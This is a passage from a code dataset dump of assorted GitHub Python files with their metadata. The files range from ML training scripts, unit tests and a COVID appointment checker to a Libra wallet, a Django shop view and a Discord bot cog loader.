cindex//2\n top = 1 + ((GC.TILEHEIGHT + 2)*rindex)\n self.image = Engine.subsurface(self.sprite, (left, top, GC.TILEWIDTH, GC.TILEHEIGHT))\n self.position = position\n\n def draw(self, surf):\n x, y = self.position\n topleft = x * GC.TILEWIDTH, y * GC.TILEHEIGHT\n surf.blit(self.image, topleft)\n","repo_name":"Wiggeh/Fire-Emblem-Custom-Project","sub_path":"Project and Game Files/Code/Cursor.py","file_name":"Cursor.py","file_ext":"py","file_size_in_byte":21380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"17418111126","text":"from mouffet.utils import common_utils\n\n\ndef test_dict_update():\n a = {\"a\": 1, \"b\": 2, \"c\": {\"a\": 1, \"b\": 2}}\n b = {\"a\": 3, \"c\": {\"b\": 3}}\n res = {\"a\": 3, \"b\": 2, \"c\": {\"a\": 1, \"b\": 3}}\n assert common_utils.deep_dict_update(a, b) == res\n\n\ndef test_dict_update_nocopy():\n a = {\"a\": 1, \"b\": 2, \"c\": {\"a\": 1, \"b\": 2}}\n b = {\"a\": 3, \"c\": {\"b\": 3}}\n tmp = common_utils.deep_dict_update(a, b)\n tmp[\"b\"] = 4\n res = {\"a\": 3, \"b\": 4, \"c\": {\"a\": 1, \"b\": 3}}\n assert a == res\n\n\ndef test_dict_update_copy():\n a = {\"a\": 1, \"b\": 2, \"c\": {\"a\": 1, \"b\": 2}}\n b = {\"a\": 3, \"c\": {\"b\": 3}}\n tmp = common_utils.deep_dict_update(a, b, copy=True)\n tmp[\"b\"] = 4\n res = {\"a\": 3, \"b\": 4, \"c\": {\"a\": 1, \"b\": 3}}\n assert a != res\n","repo_name":"Vin985/mouffet","sub_path":"tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"22649811510","text":"\r\nimport urllib.request\r\nimport json\r\nimport time\r\nimport webbrowser\r\nimport winsound\r\n\r\n#url_db = 'https://kn.mednet.de/api/express/covid/testreihen/all?praxis_id=10' #Testdaten\r\nurl_db = 'https://kn.mednet.de/api/express/covid/testreihen/all?praxis_id=17'\r\nurl_termin = 'https://kn.mednet.de/covid19/signup/?praxis=MVZ%20Birkenallee'\r\n\r\ndef main(): \r\n\r\n piep()\r\n\r\n while 1:\r\n if (check_termin() == False):\r\n time.sleep(60 * 1)\r\n else:\r\n webbrowser.open(url_termin)\r\n while (check_termin() != False):\r\n piep()\r\n time.sleep(5)\r\n piep()\r\n time.sleep(5)\r\n piep()\r\n time.sleep(5)\r\n piep()\r\n time.sleep(5)\r\n piep()\r\n time.sleep(5)\r\n piep()\r\n time.sleep(5)\r\n \r\n\r\ndef check_termin():\r\n page = urllib.request.urlopen(url_db)\r\n data = page.read()\r\n\r\n places = find_values('slots_left', data)\r\n\r\n print( time.strftime(\"%d.%m.%Y %H:%M:%S\") , places)\r\n\r\n for index, item in enumerate(places):\r\n if item > 0:\r\n print (\"Freie Termine:\", item, \"Termin Nr:\", index) \r\n return index, item\r\n\r\n return False\r\n\r\ndef find_values(id, json_repr):\r\n results = []\r\n\r\n def _decode_dict(a_dict):\r\n try:\r\n results.append(a_dict[id])\r\n except KeyError:\r\n pass\r\n return a_dict\r\n\r\n json.loads(json_repr, object_hook=_decode_dict) # Return value ignored.\r\n return results\r\n\r\ndef piep():\r\n frequency = 3700 # Set Frequency To 2500 Hertz\r\n duration = 1000 # Set Duration To 1000 ms == 1 second\r\n winsound.Beep(frequency, duration)\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\n","repo_name":"cordesmich/corona-termine","sub_path":"corona-impfung-papenburg.py","file_name":"corona-impfung-papenburg.py","file_ext":"py","file_size_in_byte":1793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"36006223761","text":"import numpy as np\r\nfrom pyspark.sql import SparkSession\r\n\r\nspark = SparkSession.builder.appName(\"processer\").getOrCreate()\r\n\r\ncols_to_keep = ['site', 'site_id', 'subsite', 'subsite_id', 'depth', 'parameter', 'lat', 'lon', 'gbrmpa_reef_id', 'time', 'cal_val', 'qc_val', 'qc_flag']\r\n\r\ndf = spark.read.csv(\"short.csv\", header=True)\r\n\r\ndf = df.select(cols_to_keep)\r\n\r\ndf.show(5)\r\n","repo_name":"SoroushSemer/Predicting-Coral-Reef-Bleaching","sub_path":"preprocess tempurature data/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"10387371235","text":"from typing import Any, ClassVar\nfrom unittest.mock import MagicMock, patch\n\nfrom google.cloud.datastore import Client, Entity\n\nfrom pdf_bot.consts import LANGUAGE\nfrom pdf_bot.language import LanguageRepository\n\n\nclass TestLanguageRepository:\n USER_ID = 0\n LANGUAGE_CODE = \"lang_code\"\n USER_ENTITY_DICT: ClassVar[dict[str, str]] = {LANGUAGE: LANGUAGE_CODE}\n\n def setup_method(self) -> None:\n self.user_entity = MagicMock(spec=Entity)\n self.db_client = MagicMock(spec=Client)\n\n self.sut = LanguageRepository(self.db_client)\n\n def test_get_language(self) -> None:\n self._mock_user_entity_dict()\n self.db_client.get.return_value = self.user_entity\n\n actual = self.sut.get_language(self.USER_ID)\n\n assert actual == self.LANGUAGE_CODE\n\n def test_get_language_without_user(self) -> None:\n self.db_client.get.return_value = None\n actual = self.sut.get_language(self.USER_ID)\n assert actual == self.sut.EN_GB_CODE\n\n def test_get_language_and_language_not_set(self) -> None:\n self.db_client.get.return_value = self.user_entity\n actual = self.sut.get_language(self.USER_ID)\n assert actual == self.sut.EN_GB_CODE\n\n def test_get_language_legacy_en_code(self) -> None:\n user_entity_dict = {LANGUAGE: \"en\"}\n self._mock_user_entity_dict(user_entity_dict)\n self.db_client.get.return_value = self.user_entity\n\n actual = self.sut.get_language(self.USER_ID)\n\n assert actual == self.sut.EN_GB_CODE\n\n def test_upsert_language(self) -> None:\n self.db_client.get.return_value = self.user_entity\n\n self.sut.upsert_language(self.USER_ID, self.LANGUAGE_CODE)\n\n self.user_entity.__setitem__.assert_called_with(LANGUAGE, self.LANGUAGE_CODE)\n self.db_client.put.assert_called_once_with(self.user_entity)\n\n def test_upsert_language_without_user(self) -> None:\n self.db_client.get.return_value = None\n\n with patch(\"pdf_bot.language.language_repository.Entity\") as entity_cls:\n entity_cls.return_value = self.user_entity\n self.sut.upsert_language(self.USER_ID, self.LANGUAGE_CODE)\n\n entity_cls.assert_called_once()\n self.user_entity.__setitem__.assert_called_with(LANGUAGE, self.LANGUAGE_CODE)\n self.db_client.put.assert_called_once_with(self.user_entity)\n\n def _mock_user_entity_dict(self, user_entity_dict: dict[str, Any] | None = None) -> None:\n if user_entity_dict is None:\n user_entity_dict = self.USER_ENTITY_DICT\n self.user_entity.__getitem__.side_effect = user_entity_dict.__getitem__\n self.user_entity.__contains__.side_effect = user_entity_dict.__contains__\n","repo_name":"zeshuaro/telegram-pdf-bot","sub_path":"tests/language/test_language_repository.py","file_name":"test_language_repository.py","file_ext":"py","file_size_in_byte":2713,"program_lang":"python","lang":"en","doc_type":"code","stars":169,"dataset":"github-code","pt":"34"} +{"seq_id":"1037740920","text":"from __future__ import print_function # only relevant for Python 2\nimport mxnet as mx\nfrom mxnet import nd, gluon, autograd\nfrom mxnet.gluon import nn\nimport nnvm\nimport tvm\nfrom tvm.contrib import graph_runtime\n\n# from quant_utils import *\nimport utils\nimport mrt as _mrt\nimport sym_annotate as anno\nimport sym_utils as sutils\nimport sym_pass as spass\nimport sym_calib as calib\nimport sim_quant_helper as sim\nimport gluon_zoo as zoo\n\nimport numpy as np\n\ndef load_fname(version, suffix=None, with_ext=False):\n suffix = \".\"+suffix if suffix is not None else \"\"\n if with_ext:\n return \"./data/mnist%s%s.json\"%(version, suffix), \\\n \"./data/mnist%s%s.params\"%(version, suffix), \\\n \"./data/mnist%s%s.ext\"%(version, suffix)\n else:\n return \"./data/mnist%s%s.json\"%(version, suffix), \\\n \"./data/mnist%s%s.params\"%(version, suffix)\n\ndef data_xform(data):\n \"\"\"Move channel axis to the beginning, cast to float32, and normalize to [0, 1].\"\"\"\n return nd.moveaxis(data, 2, 0).astype('float32') / 255\n\ntrain_data = mx.gluon.data.vision.MNIST(train=True).transform_first(data_xform)\nval_data = mx.gluon.data.vision.MNIST(train=False).transform_first(data_xform)\n\nbatch_size = 1\ntrain_loader = mx.gluon.data.DataLoader(train_data, shuffle=True, batch_size=batch_size)\nval_loader = mx.gluon.data.DataLoader(val_data, shuffle=False, batch_size=batch_size)\n\nversion = 'lenet'\nctx = mx.gpu(2)\ndef train_mnist():\n # Select a fixed random seed for reproducibility\n mx.random.seed(42)\n\n if version == '':\n net = nn.HybridSequential(prefix='DApp_')\n with net.name_scope():\n net.add(\n nn.Conv2D(channels=16, kernel_size=(3, 3), activation='relu'),\n nn.MaxPool2D(pool_size=(2, 2), strides=(1, 1)),\n nn.Conv2D(channels=32, kernel_size=(3, 3), activation='relu'),\n nn.MaxPool2D(pool_size=(2, 2), strides=(1, 1)),\n nn.Conv2D(channels=64, kernel_size=(3, 3), activation='relu'),\n nn.MaxPool2D(pool_size=(2, 2), strides=(2, 2)),\n nn.Conv2D(channels=128, kernel_size=(1, 1), activation='relu'),\n nn.MaxPool2D(pool_size=(2, 2), strides=(2, 2)),\n nn.Flatten(),\n nn.Dense(10, activation=None),\n )\n elif version == 'lenet':\n net = nn.HybridSequential(prefix='LeNet_')\n with net.name_scope():\n net.add(\n nn.Conv2D(channels=20, kernel_size=(5, 5), activation='relu'),\n nn.MaxPool2D(pool_size=(2, 2), strides=(2, 2)),\n nn.Conv2D(channels=50, kernel_size=(5, 5), activation='relu'),\n nn.MaxPool2D(pool_size=(2, 2), strides=(2, 2)),\n nn.Flatten(),\n nn.Dense(500, activation='relu'),\n nn.Dense(10, activation=None),\n )\n elif version == 'mlp':\n net = nn.HybridSequential(prefix='MLP_')\n with net.name_scope():\n net.add(\n nn.Flatten(),\n nn.Dense(128, activation='relu'),\n nn.Dense(64, activation='relu'),\n nn.Dense(10, activation=None) # loss function includes softmax already, see below\n )\n\n net.initialize(mx.init.Xavier(), ctx=ctx)\n net.summary(nd.zeros((1, 1, 28, 28), ctx=ctx))\n\n trainer = gluon.Trainer(\n\tparams=net.collect_params(),\n\toptimizer='adam',\n\toptimizer_params={'learning_rate': 1e-3},\n )\n metric = mx.metric.Accuracy()\n loss_function = gluon.loss.SoftmaxCrossEntropyLoss()\n num_epochs = 10\n\n for epoch in range(num_epochs):\n for inputs, labels in train_loader:\n inputs = inputs.as_in_context(ctx)\n labels = labels.as_in_context(ctx)\n\n with autograd.record():\n outputs = net(inputs)\n loss = loss_function(outputs, labels)\n\n loss.backward()\n metric.update(labels, outputs)\n\n trainer.step(batch_size=inputs.shape[0])\n\n name, acc = metric.get()\n print('After epoch {}: {} = {:5.2%}'.format(epoch + 1, name, acc))\n metric.reset()\n\n for inputs, labels in val_loader:\n inputs = inputs.as_in_context(ctx)\n labels = labels.as_in_context(ctx)\n metric.update(labels, net(inputs))\n print('Validaton: {} = {}'.format(*metric.get()))\n assert metric.get()[1] > 0.96\n\n sym = net(mx.sym.var('data'))\n sym_file, param_file = load_fname(version)\n open(sym_file, \"w\").write(sym.tojson())\n net.collect_params().save(param_file)\n\ndef test_sym_pass(iter_num=10):\n inputs_ext = { 'data': {\n 'shape': (batch_size, 1, 28, 28),\n } }\n inputs = [mx.sym.var(n) for n in inputs_ext]\n\n data_iter = iter(val_loader)\n def data_iter_func():\n return next(data_iter)\n data, _ = data_iter_func()\n\n net1 = utils.load_model(*load_fname(version), inputs, ctx=ctx)\n def graph_func(data):\n return net1.forward(data.as_in_context(ctx))\n\n sym_file, param_file = load_fname(version)\n sym, params = mx.sym.load(sym_file), nd.load(param_file)\n sym, params = spass.sym_quant_prepare(sym, params, inputs_ext)\n if True:\n mrt = _mrt.MRT(sym, params, inputs_ext)\n mrt.set_data('data', data)\n mrt.calibrate(ctx=ctx)\n mrt.set_output_prec(8)\n qsym, qparams, inputs_ext = mrt.quantize()\n else:\n inputs_ext['data']['data'] = data\n th_dict = calib.sym_calibrate(sym, params, inputs_ext, ctx=ctx)\n qsym, qparams, precs, _ = calib.sym_simulate(sym, params, inputs_ext, th_dict)\n qsym, qparams = calib.sym_realize(qsym, qparams, inputs_ext, precs, \"cvm\")\n dump_sym, dump_params, dump_ext = load_fname(version, \"sym.quantize\", True)\n sim.save_ext(dump_ext, inputs_ext)\n nd.save(dump_params, qparams)\n open(dump_sym, \"w\").write(qsym.tojson())\n\n dump_sym, dump_params, dump_ext = load_fname(version, \"sym.quantize\", True)\n (inputs_ext,) = sim.load_ext(dump_ext)\n inputs = [mx.sym.var(n) for n in inputs_ext]\n net2 = utils.load_model(dump_sym, dump_params, inputs, ctx=ctx)\n def cvm_quantize(data):\n data = sim.load_real_data(data, 'data', inputs_ext)\n return net2.forward(data.as_in_context(ctx))\n\n utils.multi_eval_accuracy(graph_func, data_iter_func,\n cvm_quantize,\n iter_num=iter_num)\n\ndef test_nnvm_pass(iter_num=10):\n logger = logging.getLogger(\"log.test.nnvm\")\n logger.info(\"=== Log Test NNVM ===\")\n\n dump_sym, dump_params, dump_ext = load_fname(version, \"sym.quantize\", True)\n sym, params = mx.sym.load(dump_sym), nd.load(dump_params)\n (inputs_ext,) = sim.load_ext(dump_ext)\n data_iter = iter(val_loader)\n data, _ = next(data_iter)\n _mrt.std_dump(sym, params, inputs_ext, data, \"cvm_mnist\")\n\nprint (\"Test mnist\", version)\n# train_mnist()\nutils.log_init()\ntest_sym_pass(1000)\n# test_nnvm_pass(10)\n","repo_name":"CortexFoundation/tvm-cvm","sub_path":"cvm/tests/test_mnist.py","file_name":"test_mnist.py","file_ext":"py","file_size_in_byte":6919,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"34"} +{"seq_id":"8398947446","text":"from PIL import Image\r\nimport numpy as np\r\nimport os\r\nimport cv2\r\n\r\ndef align_head_to_body(joined,output_path):\r\n # Read the input image\r\n img = Image.open('shirt_pant.png')\r\n\r\n # Convert the image into a numpy array\r\n img_array = np.array(img)\r\n\r\n # Detect the head region using HoughCircles method of OpenCV\r\n img_gray = cv2.cvtColor(img_array, cv2.COLOR_RGB2GRAY)\r\n circles = cv2.HoughCircles(img_gray, cv2.HOUGH_GRADIENT, dp=1, minDist=100,\r\n param1=50, param2=30, minRadius=50, maxRadius=150)\r\n head_cx, head_cy, head_r = circles[0][0]\r\n\r\n # Define the body region as the remaining part of the image\r\n body_left = 0\r\n body_top = int(head_cy + head_r)\r\n body_right = img.width\r\n body_bottom = img.height\r\n\r\n\r\n # Crop the head and body regions from the image\r\n head_img = img.crop((head_cx - head_r, head_cy - head_r, head_cx + head_r, head_cy + head_r))\r\n body_img = img.crop((body_left, body_top, body_right, body_bottom))\r\n\r\n # Calculate the offset to align the head to the center of the body\r\n offset_x = int((body_right - body_left - 2 * head_r) / 2)\r\n offset_y = int(head_r)\r\n\r\n # Create a new image with the aligned head and body regions\r\n new_img = Image.new(\"RGBA\", (img.width, img.height), (0, 0, 0, 0))\r\n new_img.paste(body_img, (0, 0))\r\n new_img.paste(head_img, (offset_x, offset_y), mask=head_img)\r\n\r\n # Save the final image to the output path\r\n new_img.save('output_path')\r\n","repo_name":"ifaizanahmed9/Manipulating-images-using-python","sub_path":"align_head_to_body.py","file_name":"align_head_to_body.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"40128675663","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\nfrom flask import Flask\nfrom flask import request, jsonify\nfrom keras.models import Sequential\nfrom flask_restful import Api, Resource, reqparse\nfrom keras.layers import Dense\nfrom keras.optimizers import Adam\nfrom sklearn.model_selection import train_test_split\nimport numpy as np\nimport pandas as pd\nimport joblib\nfrom flask_restful import Resource\n\n\ndef model_f(X,Y):\n \n X_train, X_test, y_train, y_test = train_test_split(X, Y, test_size=0.2, random_state=0)\n model = Sequential()\n model.add(Dense(10, input_shape=(1,), activation='relu'))\n model.add(Dense(8, activation='relu'))\n model.add(Dense(6, activation='relu'))\n model.add(Dense(3, activation='softmax'))\n model.compile(Adam(lr=0.001), 'categorical_crossentropy', metrics=['accuracy'])\n \n model.fit(X_train, y_train, epochs=1)\n \n return model\n\nif __name__ == '__main__':\n \n inner = pd.read_csv('data/Faulty_inner.csv')\n outer = pd.read_csv('data/Faulty_outer.csv')\n healthy = pd.read_csv('data/healthy.csv')\n \n pd.DataFrame(healthy)\n pd.DataFrame(outer)\n pd.DataFrame(inner)\n \n merge = pd.merge(inner, outer, how=\"outer\")\n dataset = pd.merge(merge, healthy, how=\"outer\")\n \n X = dataset.Vibration\n x_norm = (X - np.min(X))/(np.max(X)-np.min(X))\n X = x_norm\n \n \n\n Y = pd.get_dummies(dataset.Condition)\n Y = Y.values\n \n mdl = model_f(X,Y)\n \nmdl.save('my_model.h5')\n\n","repo_name":"eziomentor/project_1","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"14526799722","text":"from canoser import Uint16\r\nfrom mnemonic import Mnemonic\r\nimport libra\r\nfrom libra_client.key_factory import KeyFactory\r\nfrom libra.account_address import HEX_ADDRESS_LENGTH\r\n\r\nMAX_CHILD_COUNT = Uint16.max_value\r\n\r\n\r\nclass WalletLibrary:\r\n\r\n DELIMITER = \";\"\r\n\r\n def __init__(self, mnemonic, seed, key_factory, child_count, rotate_keys={}):\r\n self.mnemonic = mnemonic\r\n self.seed = seed\r\n self.key_factory = key_factory\r\n self.child_count = child_count\r\n self.rotate_keys = rotate_keys\r\n self.accounts = []\r\n if child_count > 0:\r\n self._recover_accounts()\r\n for ik, iv in self.rotate_keys.items():\r\n # TODO: check rotate key\r\n privkey = self.accounts[iv].private_key\r\n address = self.accounts[ik].address\r\n self.accounts[ik] = libra.Account(privkey, address=address)\r\n # print(\"rotate_keys:\", rotate_keys)\r\n\r\n def json_print_fields(self):\r\n return [\"mnemonic\", \"seed\", \"child_count\", \"accounts.address\"]\r\n\r\n def find_account_by_address_hex(self, address):\r\n for index, account in enumerate(self.accounts):\r\n if account.address.hex() == address:\r\n return (index, account)\r\n return (None, None)\r\n\r\n def find_account_by_publickey_hex(self, pubkey):\r\n for index, account in enumerate(self.accounts):\r\n if account.public_key.hex() == pubkey:\r\n return (index, account)\r\n return (None, None)\r\n\r\n def rotate_key(self, to_rotate_id, master_id):\r\n to_rotate_id = Uint16.int_safe(str(to_rotate_id))\r\n master_id = Uint16.int_safe(str(master_id))\r\n self.rotate_keys[to_rotate_id] = master_id\r\n\r\n def _recover_accounts(self):\r\n for idx in range(self.child_count):\r\n self._add_account(idx)\r\n\r\n def _add_account(self, account_idx):\r\n privkey = self.key_factory.private_child(account_idx)\r\n account = libra.Account(privkey)\r\n self.accounts.append(account)\r\n return account\r\n\r\n def new_account(self):\r\n child_index = self.child_count\r\n self.child_count += 1\r\n return self._add_account(child_index)\r\n\r\n @classmethod\r\n def new(cls):\r\n m = Mnemonic(\"english\")\r\n mnemonic = m.generate(192)\r\n return cls.new_from_mnemonic(mnemonic)\r\n\r\n @classmethod\r\n def new_from_mnemonic(cls, mnemonic, child_count=0, rotate_keys={}):\r\n seed = KeyFactory.to_seed(mnemonic)\r\n key_factory = KeyFactory(seed)\r\n return cls(mnemonic, seed, key_factory, child_count, rotate_keys)\r\n\r\n @classmethod\r\n def recover(cls, filename):\r\n with open(filename) as f:\r\n data = f.read()\r\n arr = data.split(WalletLibrary.DELIMITER)\r\n try:\r\n rotate_keys = cls.recover_rotate_pairs(filename)\r\n except FileNotFoundError:\r\n rotate_keys = {}\r\n return cls.new_from_mnemonic(arr[0], Uint16.int_safe(arr[1]), rotate_keys)\r\n\r\n @classmethod\r\n def recover_rotate_pairs(cls, filename):\r\n rotate_keys = {}\r\n with open(filename + \".rotate\") as f:\r\n data = f.read()\r\n arr = data.split(WalletLibrary.DELIMITER)\r\n if arr[-1] == '':\r\n arr = arr[0:-1]\r\n for pair in arr:\r\n arr2 = pair.split(\",\")\r\n if len(arr2) != 2:\r\n raise ValueError(\"rotate file format error.\")\r\n rotate_keys[Uint16.int_safe(arr2[0])] = Uint16.int_safe(arr2[1])\r\n return rotate_keys\r\n\r\n def write_recovery(self, filename):\r\n with open(filename, 'wt') as f:\r\n f.write(self.mnemonic)\r\n f.write(WalletLibrary.DELIMITER)\r\n f.write(str(self.child_count))\r\n self.write_recovery_rotate(filename)\r\n\r\n def write_recovery_rotate(self, filename):\r\n with open(filename + \".rotate\", 'wt') as f:\r\n for k, v in self.rotate_keys.items():\r\n f.write(str(k))\r\n f.write(\",\")\r\n f.write(str(v))\r\n f.write(WalletLibrary.DELIMITER)\r\n\r\n def get_account_by_address_or_refid(self, address_or_refid):\r\n slen = len(address_or_refid)\r\n if slen > HEX_ADDRESS_LENGTH or (slen < HEX_ADDRESS_LENGTH and slen > len(str(MAX_CHILD_COUNT))):\r\n raise ValueError(f\"address:{address_or_refid} is not valid.\")\r\n if slen == HEX_ADDRESS_LENGTH:\r\n _i, account = self.find_account_by_address_hex(address_or_refid)\r\n if account is None:\r\n raise ValueError(f\"account:{address_or_refid} not in wallet.\")\r\n return account\r\n else:\r\n idx = Uint16.int_safe(address_or_refid)\r\n if idx >= 0 and idx < self.child_count:\r\n return self.accounts[idx]\r\n else:\r\n raise ValueError(f\"account index {idx} out of range:{self.child_count}\")\r\n","repo_name":"yuan-xy/libra-client","sub_path":"libra_client/wallet_library.py","file_name":"wallet_library.py","file_ext":"py","file_size_in_byte":4978,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"34"} +{"seq_id":"17933488219","text":"from dingtest import dingTalk\nfrom read_excel import read_excel,convert\n\ntask = read_excel()\t\n\nconcrete1 = '中班'\nMobile1 = convert(concrete1,task)\natall = False\ncontent_txt1 = '陈富贵提醒您:确认排错表是否有未复核检验数据'\ndingTalk(content_txt1,Mobile1,atall)\n\n","repo_name":"xuysang/learn_python","sub_path":"编程/python/基础代码/定点提醒/中班排错表.py","file_name":"中班排错表.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"40634457401","text":"\"\"\"\nDepends: cron (pip install cron.py)\nuse cron to run the \"CountFrequentyID\" hourly or daily\na time marker is printed everytime\n\"\"\"\nimport time\nimport cron\nimport datetime\nfrom CountFrequentID import *\nfrom datetime import datetime\n\nfrequency = 'hourly' # the running frequency of \"CountFrequentID.py\"\n\ndef PrintTime():\n print (\"The job is done at: \", str(datetime.now()))\n\nif frequency == 'hourly':\n job = cron.Cron()\n job.add('0 */1 * * *', PrintTime)\n job.add('0 */1 * * *', CountFrequentyID, Board, Browser,\n TopN, Today, Year, Month, Day, RecentMonth)\nelif frequency == 'daily':\n job = cron.Cron()\n job.add('0 0 */1 * *', PrintTime)\n job.add('0 0 */1 * *', CountFrequentyID, Board, Browser,\n TopN, Today, Year, Month, Day, RecentMonth)\n\n\njob.start()\n\n# if you want to stop the job, type \"job.stop()\" in the command line\n# and hit \"Enter\"\n","repo_name":"shanshanlaiche/Mitbbs_CountFrequentID","sub_path":"CountFrequentID_Cron.py","file_name":"CountFrequentID_Cron.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"33744724622","text":"from django.contrib.auth.forms import UserCreationForm\nfrom django.urls import reverse_lazy,reverse\nfrom django.views import generic\nfrom .utils import cartData\nfrom django.shortcuts import render,redirect\nfrom .models import *\nfrom django.http import HttpResponseRedirect\n\nclass SignUpView(generic.CreateView):\n form_class = UserCreationForm\n success_url = reverse_lazy('login')\n template_name = 'registration/signup.html'\n\ndef home(request):\n data = cartData(request)\n cartItem = data['cartItems']\n \n product = Product.objects.all()\n context = {'products':product,'cartItem':cartItem}\n return render(request,'home.html',context)\n\ndef cart(request):\n data = cartData(request)\n cartItem = data['cartItems']\n order = data['order']\n items = data['items']\n print(items)\n total = order.get_cart_items * order.get_cart_total\n\n context = {'items':items,'order':order,'cartItem':cartItem,'total':total}\n return render(request,'cart.html',context)\n\ndef add_to_cart(request,id):\n if request.method == \"POST\":\n customer = request.user.customer\n \n product = Product.objects.get(id=id)\n \n order, created = Order.objects.get_or_create(customer=customer, complete=False)\n\n orderItem, created = OrderItem.objects.get_or_create(order=order, product=product)\n orderItem.quantity = orderItem.quantity + 1\n\n orderItem.save()\n\n\n # if orderItem.quantity <= 0:\n # orderItem.delete()\n\n return HttpResponseRedirect('/')\n\n \n\ndef cart(request):\n user=request.user\n customer,created = Customer.objects.get_or_create(user=user)\n\n order, created = Order.objects.get_or_create(customer=customer, complete=False)\n items = order.orderitem_set.all()\n cartItems = order.get_cart_items\n\n context = {\n 'items':items,\n 'order':order,\n 'cartItem':cartItems\n }\n print(items,cartItems,order)\n return render(request,'cart.html',context)\n\ndef increaseItem(request,id):\n user= request.user\n item = OrderItem.objects.get(id=id)\n item.quantity += 1\n item.save()\n print(item.quantity)\n\n return HttpResponseRedirect(reverse(\"cart\"))\n\ndef decreaseitem(request,id):\n user= request.user\n item = OrderItem.objects.get(id=id)\n item.quantity -= 1\n item.save()\n if item.quantity <= 0:\n item.delete()\n print(item)\n\n return HttpResponseRedirect(reverse(\"cart\"))","repo_name":"ashiljacob/ecom_task","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"28128061074","text":"import sys\n# input = sys.stdin.readline\nsys.stdin = open('input_13458.txt')\n\n'''\n143644KB / 884ms 뭐야 왜 이렇게 거대해?\n143644KB / 788ms\n'''\n\nT = int(input())\nfor t in range(1, T+1):\n N = int(input())\n A = list(map(int, input().split()))\n B, C = map(int, input().split())\n supervisor = 0\n\n for i in range(N):\n temp = A[i] - B # 변수로 받아줘서 최대한 줄여보려 함\n if temp <= 0:\n supervisor += 1\n else:\n if temp % C:\n supervisor += (temp // C) + 2\n else:\n supervisor += (temp // C) + 1\n\n print(supervisor)","repo_name":"sungyeon-0975/algo_study","sub_path":"210909/13458_yoon.py","file_name":"13458_yoon.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"19189554266","text":"import os\nimport utils\n\n\ndef read(directory: str):\n states, energies = [], []\n for traj_index in sorted(os.listdir(directory)):\n os.chdir(directory + \"/\" + traj_index)\n\n for traj_name in sorted(os.listdir()):\n if any(map(str.isdigit, traj_name)):\n # Read locations to states\n lis = list(map(int, traj_name.split(\"_\")[1:-1]))\n state = utils.loc2state(lis)\n states.append(state)\n # Read energies\n os.chdir(traj_name)\n curve_filename = [filename for filename in os.listdir() if filename.startswith(\"curve\")][0]\n _, _, energy = utils.read_curve(curve_filename)\n energies.append(energy)\n os.chdir(\"..\")\n os.chdir('../../../..')\n return states, energies\n\n\ndef read_all(dir_list):\n states_all, energies_all = [], []\n for directory in dir_list:\n states, energies = read(directory)\n states_all.extend(states)\n energies_all.extend(energies)\n return states_all, energies_all\n\n\n\n\n","repo_name":"BOWENmeZHENG/go_rl","sub_path":"data_process.py","file_name":"data_process.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"9731769767","text":"\"\"\"\r\nMIT LICENCE 2020 - 2021\r\nAll the code and the full bot is nothing but TheImperialGod\r\nAll the code is made by NightZan999, check him out at https://github.com/NightZan999\r\nThe deposit and withdraw command have been added on to by Makiyu-py, he used it in a fork\r\nThe repository the code has been taken from is at https://github.com/NightZan999/TheImperialGod\r\n\r\nBe sure to have this in your project at the beginning!\r\n\"\"\"\r\nimport discord #discord object\r\nfrom discord.ext import commands, tasks #commands from external\r\nimport random #random\r\nimport json\r\nimport os\r\nimport asyncio\r\n\r\ndef load_cogs(): #loading all our cogs\r\n cogs = [\r\n \"cogs.info.help\", # help command\r\n \"cogs.fun.animals\", # searching reddit\r\n \"cogs.economy.bankcommands\", # bank commands in economy\r\n \"cogs.economy.moneymaking\", # moneymaking commands in economy\r\n \"cogs.economy.shop\", # making a shop with database in economy!\r\n \"cogs.economy.gambling\", # gambling commands\r\n \"cogs.fun.misc\", # misc commands\r\n \"cogs.fun.utils\", # utilities\r\n \"cogs.info.info\", # information\r\n \"cogs.info.math\", # math commands\r\n \"cogs.moderation.giveaways\", # giveaway commands!\r\n \"cogs.moderation.mod\", # moderation commands\r\n \"cogs.owner.owner\", # owner commands\r\n \"cogs.tickets.tickets\", # ticket commands\r\n \"cogs.info.topgg\", # has top.gg stuff bois!\r\n \"cogs.exclusive.exclusive\", # has exclusive commands\r\n \"cogs.moderation.autorole\", # autoroles\r\n \"cogs.music.music\", # music :D\r\n \"cogs.info.minecraft\", # minecraft commands\r\n \"cogs.points.points\", # points\r\n \"cogs.owner.patch\" # patching stuff\r\n ]\r\n \r\n for cog in cogs:\r\n client.load_extension(cog)\r\n\r\n events = [\r\n \"events.GuildEvents\", # when the bot leaves or joins a guild!\r\n \"events.ReactionAdd\",\r\n \"events.ReactionRemove\",\r\n \"events.OnCommand\",\r\n \"cogs.points.pointevents\"\r\n ]\r\n\r\n for 